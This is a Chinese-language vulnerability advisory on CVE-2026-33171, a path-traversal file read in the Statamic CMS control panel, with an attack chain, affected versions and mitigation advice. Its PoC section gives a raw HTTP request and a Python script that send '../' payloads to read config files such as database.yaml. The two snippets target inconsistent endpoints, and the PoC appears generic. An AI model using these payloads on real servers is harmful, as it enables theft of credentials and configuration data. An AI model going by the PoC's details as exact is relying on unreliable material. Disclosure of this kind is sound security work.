IPBUF安全漏洞报告
English
CVE-2026-33171 CVSS 4.3 中危

CVE-2026-33171 Statamic CMS 任意文件读取漏洞

披露日期: 2026-03-20
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33171
漏洞类型
任意文件读取
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Statamic CMS

相关标签

Arbitrary File ReadPath TraversalStatamicCMSLaravelAuthenticated Vulnerability

漏洞概述

Statamic 是一个基于 Laravel 和 Git 驱动的内容管理系统(CMS)。在 5.73.14 和 6.7.0 版本之前,存在一处安全漏洞,允许经过身份验证的控制面板用户通过操作字段类型端点中文件字典的 `filename` 配置参数,从服务器读取任意 `.json`、`.yaml` 和 `.csv` 文件。该漏洞可能导致敏感配置信息泄露,已在 5.73.14 和 6.7.0 版本中修复。

技术细节

该漏洞的成因在于 Statamic CMS 在处理字段类型端点请求时,对用户输入的 `filename` 配置参数缺乏严格的路径校验和过滤。由于 Statamic 基于 Laravel 框架构建,其部分字段类型功能允许用户指定文件路径以读取数据。攻击者首先需要获取一个具有控制面板访问权限的低权限账户。随后,利用该漏洞,攻击者可以在发送给字段类型端点的请求中,构造恶意的 `filename` 参数值,通过插入路径遍历序列(如 `../`)跳出预期的目录限制。尽管系统限制了文件后缀仅为 `.json`、`.yaml` 和 `.csv`,攻击者仍可利用此限制读取应用程序的配置文件(如 `.env` 的备份转换文件)、用户数据文件或其他敏感结构化数据。这种未经授权的文件读取行为可能导致数据库凭据泄露、API 密钥暴露,为进一步的渗透攻击提供关键信息。

攻击链分析

STEP 1
步骤1
攻击者获取 Statamic CMS 控制面板的低权限账户凭据。
STEP 2
步骤2
攻击者向字段类型端点发送经过精心设计的 HTTP 请求。
STEP 3
步骤3
请求中包含恶意构造的 `filename` 参数(如 `../../config/database.yaml`),利用路径遍历绕过限制。
STEP 4
步骤4
服务器端未正确校验路径,直接读取并返回文件内容。
STEP 5
步骤5
攻击者获取服务器上的敏感配置信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
POST /cp/collections/entries HTTP/1.1 Host: target.com Cookie: statamic_session=valid_session_cookie X-CSRF-TOKEN: your_csrf_token Content-Type: application/json { "fields": { "file_field": { "config": { "filename": "../../../.env.yaml" } } } } # Python POC Example import requests target_url = "http://target.com/cp/fields/endpoint" session_cookie = "" headers = { "Cookie": f"statamic_session={session_cookie}", "X-CSRF-TOKEN": "", "Content-Type": "application/json" } # Exploit payload reading a config file payload = { "config": { "filename": "../../../config/database.yaml" } } response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("Vulnerable! File content:") print(response.text) else: print("Exploit failed")

影响范围

Statamic CMS < 5.73.14
Statamic CMS < 6.7.0

防御指南

临时缓解措施
建议管理员尽快检查系统版本并进行升级。若暂时无法升级,应严格限制控制面板的网络访问(如通过IP白名单),并加强对异常文件读取请求的日志监控,及时发现潜在的利用行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表